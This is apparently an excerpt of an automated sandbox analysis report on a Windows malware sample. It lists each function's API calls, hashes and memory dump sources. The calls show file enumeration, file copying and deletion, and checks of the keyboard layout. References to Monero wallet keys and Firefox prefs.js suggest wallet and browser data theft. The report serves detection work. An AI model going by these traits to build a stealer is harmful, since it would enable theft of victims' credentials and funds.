                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: 24947b0b93c51209620e5f9d0402dffcc39aff4fc7373b3362a25cad64ae5a57
                        • Instruction ID: 2ec927b693910a9e0d0a0e5f2917b7b39f465bf1c17cf38094847d3165624e3f
                        • Opcode Fuzzy Hash: 24947b0b93c51209620e5f9d0402dffcc39aff4fc7373b3362a25cad64ae5a57
                        • Instruction Fuzzy Hash: 2B6174B1500219ABCB64EBE4DC49FEA73BCFB59700F048588A60DD6185EB35DB85CF92
                        Function 00874570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00874580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00874587
                        • wsprintfA.USER32 ref: 008745A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 008745BD
                        • StrCmpCA.SHLWAPI(?,00880FC4), ref: 008745EB
                        • StrCmpCA.SHLWAPI(?,00880FC8), ref: 00874601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0087468B
                        • FindClose.KERNEL32(000000FF), ref: 008746A0
                        • lstrcat.KERNEL32(?,0116EE98), ref: 008746C5
                        • lstrcat.KERNEL32(?,0116E2D8), ref: 008746D8
                        • lstrlen.KERNEL32(?), ref: 008746E5
                        • lstrlen.KERNEL32(?), ref: 008746F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 87911bc577efa3a39babd81eafb5d1bf57f86934dc07851b49f04c7b89bceb8c
                        • Instruction ID: dcbfe6f4e58b9a63a17d4504e422c917bb38573f8c8132aa167915259740bfe7
                        • Opcode Fuzzy Hash: 87911bc577efa3a39babd81eafb5d1bf57f86934dc07851b49f04c7b89bceb8c
                        • Instruction Fuzzy Hash: 8B5154B15402199BC764EBB4DC89FEA73BCFB68300F408588B61DD2194EB74DA85CF92
                        Function 00873EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00873EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 00873EDA
                        • StrCmpCA.SHLWAPI(?,00880FAC), ref: 00873F08
                        • StrCmpCA.SHLWAPI(?,00880FB0), ref: 00873F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0087406C
                        • FindClose.KERNEL32(000000FF), ref: 00874081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: a590de9cbaf31706e2c2da58ca28d00e777ae8d7d1a5fa8a14686798b7fcb53f
                        • Instruction ID: b5ea35a1ac4dbed4d117518ac2b856e9881da1d219744e41d34249d4e658178f
                        • Opcode Fuzzy Hash: a590de9cbaf31706e2c2da58ca28d00e777ae8d7d1a5fa8a14686798b7fcb53f
                        • Instruction Fuzzy Hash: 1F5147B2900219ABCB64EBB4DC45EEA73BCFB58300F408588B65DD6084DB75DB86CF52
                        Function 0086ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0086ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0086ED55
                        • StrCmpCA.SHLWAPI(?,00881538), ref: 0086EDAB
                        • StrCmpCA.SHLWAPI(?,0088153C), ref: 0086EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086F2AE
                        • FindClose.KERNEL32(000000FF), ref: 0086F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 8a877be13600dd188e965ad739958e8d5c535b5f8b6567073a6efcb2bf1a3252
                        • Instruction ID: 9dc21b847abcc916228d03a2f554e77d3c511fdf5519c9e4a231b932d3fb8060
                        • Opcode Fuzzy Hash: 8a877be13600dd188e965ad739958e8d5c535b5f8b6567073a6efcb2bf1a3252
                        • Instruction Fuzzy Hash: 04E1C0719111185ADB58FB64DC91EEE7378FF94300F4081A9B51AE2096EF30AB8ACF53
                        Function 0086F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008815B8,00880D96), ref: 0086F71E
                        • StrCmpCA.SHLWAPI(?,008815BC), ref: 0086F76F
                        • StrCmpCA.SHLWAPI(?,008815C0), ref: 0086F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0086FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 9ca863b739d2dfecf96b2bb3fb9c18173af87b81aaa4f7b6731473416123887e
                        • Instruction ID: 6f1379a5f19ace771bd2c505f72ee232d58292e2bfdfb25a408f1f171d8e4e22
                        • Opcode Fuzzy Hash: 9ca863b739d2dfecf96b2bb3fb9c18173af87b81aaa4f7b6731473416123887e
                        • Instruction Fuzzy Hash: E9B112719001189BDB28FB68DC95AEE7379FF94300F4085A8A51ED6196EF30DB49CB93
                        Function 008616D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0088510C,?,?,?,008851B4,?,?,00000000,?,00000000), ref: 00861923
                        • StrCmpCA.SHLWAPI(?,0088525C), ref: 00861973
                        • StrCmpCA.SHLWAPI(?,00885304), ref: 00861989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00861D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00861DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00861E20
                        • FindClose.KERNEL32(000000FF), ref: 00861E32
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: f61c5e357d3ff107f7e8d90c9756503501e5fc4876f80a4d96e4e161b166c00b
                        • Instruction ID: 3a9cb403ad49e79ea4e5a2172452c645177b4467fe397a28e6694f99280a372d
                        • Opcode Fuzzy Hash: f61c5e357d3ff107f7e8d90c9756503501e5fc4876f80a4d96e4e161b166c00b
                        • Instruction Fuzzy Hash: 2F12E2719101189ADB59FB64CC95EEE7778FF94300F4081A9A52ED2095EF30AB89CF93
                        Function 0086DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00880C2E), ref: 0086DE5E
                        • StrCmpCA.SHLWAPI(?,008814C8), ref: 0086DEAE
                        • StrCmpCA.SHLWAPI(?,008814CC), ref: 0086DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086E3E0
                        • FindClose.KERNEL32(000000FF), ref: 0086E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: dfadb620f63ae2832f1dadbac726de76492200e6d2e23a7930a49f96dc149e78
                        • Instruction ID: 3e9233d546b7699e3123674aa482e1ffc958eaf968dbf9bf5a5a0c589b2cf9be
                        • Opcode Fuzzy Hash: dfadb620f63ae2832f1dadbac726de76492200e6d2e23a7930a49f96dc149e78
                        • Instruction Fuzzy Hash: 76F18F719141189ADB19FB64CC95EEE7378FF54300F4081A9A52EA2095EF34AB8ACF53
                        Function 0086DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008814B0,00880C2A), ref: 0086DAEB
                        • StrCmpCA.SHLWAPI(?,008814B4), ref: 0086DB33
                        • StrCmpCA.SHLWAPI(?,008814B8), ref: 0086DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086DDCC
                        • FindClose.KERNEL32(000000FF), ref: 0086DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 597a768e956846c3073575dc0ef26bed3a52f4f9f90d66c9b7919102d154935d
                        • Instruction ID: 809e59f66f5dbd6e2246d20c94ff500eecf5b09ffb0fe8e36e311bc6f467c909
                        • Opcode Fuzzy Hash: 597a768e956846c3073575dc0ef26bed3a52f4f9f90d66c9b7919102d154935d
                        • Instruction Fuzzy Hash: 3A913F72A0020497CB18FBB8DC969EE737DFBD4300F418568A95AD6185EF34DB098B93
                        Function 00C2FBF6 Relevance: 11.6, Strings: 8, Instructions: 1610COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .$w~$X?>$]l1$]l1$fkC$g$u}$sVGu$G;*
                        • API String ID: 0-1463576589
                        • Opcode ID: d27e1e8e3ae3442df0a85a50f21ca79775df0c671964d578be62a4f954c8990d
                        • Instruction ID: 9ac09cccba7c2676d3f55dd61d8894ce393afa83304e5e95bdf9221075b0b5f1
                        • Opcode Fuzzy Hash: d27e1e8e3ae3442df0a85a50f21ca79775df0c671964d578be62a4f954c8990d
                        • Instruction Fuzzy Hash: C6B217F350C2049FE304AE2DEC8567AFBE9EB94320F16893DEAC4C7744EA3558058697
                        Function 00877B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,008805AF), ref: 00877BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00877BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00877C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00877C62
                        • LocalFree.KERNEL32(00000000), ref: 00877D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 64161998585080adfb89118161d5867e6ff3ee537944ea1c916e305b16e7684f
                        • Instruction ID: 40be45f577a747a292bfc5b7802181f18670be27fa2bfae5862ba5cf650049d0
                        • Opcode Fuzzy Hash: 64161998585080adfb89118161d5867e6ff3ee537944ea1c916e305b16e7684f
                        • Instruction Fuzzy Hash: D5416071940118ABCB24DB94DC89FEEB7B4FF58700F108199E11DA2284DB346F85CFA2
                        Function 00C2A98F Relevance: 10.4, Strings: 7, Instructions: 1655COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
